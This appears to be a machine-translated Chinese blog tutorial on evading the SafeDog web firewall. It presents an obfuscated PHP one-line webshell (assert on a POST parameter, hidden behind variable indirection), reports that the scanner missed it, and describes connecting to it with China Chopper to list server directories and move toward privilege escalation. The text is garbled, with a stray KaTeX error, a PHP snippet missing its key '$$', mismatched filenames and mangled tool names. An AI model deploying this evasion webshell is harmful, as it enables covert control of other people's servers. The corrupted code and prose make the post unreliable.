chanong 网站安全狗:针对网站安全,包括网页木马查杀(自有引擎,仅针对网页木马); 网马主动防御功能(可主动拦截网马上传、访问行为); 防SQL注入功能、防XSS跨站攻击功能; 防盗链和下载; 以及CC攻击的预防。
服务器安全狗:针对服务器安全,包括内核驱动的防DDOS攻击、防ARP攻击、防WEB CC攻击功能; 内核驱动的主动文件系统保护功能(可以防止文件被篡改,保护系统文件); 基于内核驱动的服务器其他方面的主动防御功能(系统账户、注册表、远程登录等保护); 以及全面的服务器优化和体检功能。
安全 Dogfu Cloud:基于云的监控和保护。 Safe Dogfu Cloud利用云计算技术为用户构建全面的服务器和网站监控保护平台。 利用该平台,用户可以实现24小时服务器健康状况监控、资源监控和资源报警; 24小时服务器可用性监控; 网站安全云扫描,发现网站各种漏洞; 基于云技术的网站防篡改功能,确保网站文件不被非法修改。
然后我们下载安全狗并安装,如下图。
安装成功后,包含网站防护、资源防护、IP黑白名单、防护日志四大核心功能。
2.关于狗的一句话
假设我们有一个“a.php”文件和一个“gou.php”文件。
其中,“a.php”语句木马如下图:
gou.php的代码如下:
<?php
$a='b';
$a='assert';
$b($_POST[fox]);
?>点击网马扫描下方的“自定义路径扫描”按钮,如下图所示。
然后选择指定的目录,这里就是我们的拍摄范围“WWW/gou”文件夹。
扫描的结果是,找到了我们的PHP一句话木马,但没有找到欺骗性的一句话。
木马提示如下图:
我们的“dog.php”没有找到,可以直接访问。 接下来我们用一把中国菜刀和一把狗刀来连接并解释它是如何工作的。
3、在狗周围告诉狗的原则
包裹狗的木马代码如下:
<?php
$a='b';
$a='assert';
$b($_POST[fox]);
?>
“$a='';” 这里实际上是“$b”。 由于“KaTeX parse error: : \b at 1: \̲b̲”没有直接赋值,安全狗不会提示..._POST[fox])”,实际上是一个单句木马。那么我们尝试连接使用。
请注意,我们的远程服务器上传的文件名为“dog.php”。
这就提示安全狗拦截,如下图:
如下图所示,China 成功获取服务器的文件目录。
然后尝试用狗刀连接。
连接的网址如下,密码是“fox”(fox老师的名字)。
最终成功获取服务器目录。
然后尝试使用工具抓包,对比“中华菜刀”和“狗刀”的流量。
将数据包复制到记事本中进行比较。 上半部分是“中国菜刀”获取的数据包,下半部分是“狗刀”获取的数据包。
提取z0和z1,如下图,通常搜索%然后转换“=”、“+”等字符。
从安全工具中找到转码工具。
转码结果如下图所示:
“ ”流量转码结果如下:
“狗刀”流量转码结果如下:
两段流量的区别如下:
这里建议尝试自己抓包并分析狗菜刀的原理,然后编写自己的代码。 我们通过谷歌成功绕过并控制了整个C盘,这对我们的提权有很大的帮助。
4. 总结
至此,这篇基础文章就结束了。 最后,希望这篇基础文章对您有所帮助。 突然发现作者写了400篇文章,非常值得纪念。 希望以后能够帮助到更多的读者。 我也觉得自己的技术水平很浅,需要学习很多知识。 希望自己能够在读博士的四年里不断成长。 最后祝愿明天考研的同学们取得好成绩,不负青春~
微信扫一扫打赏
支付宝扫一扫打赏
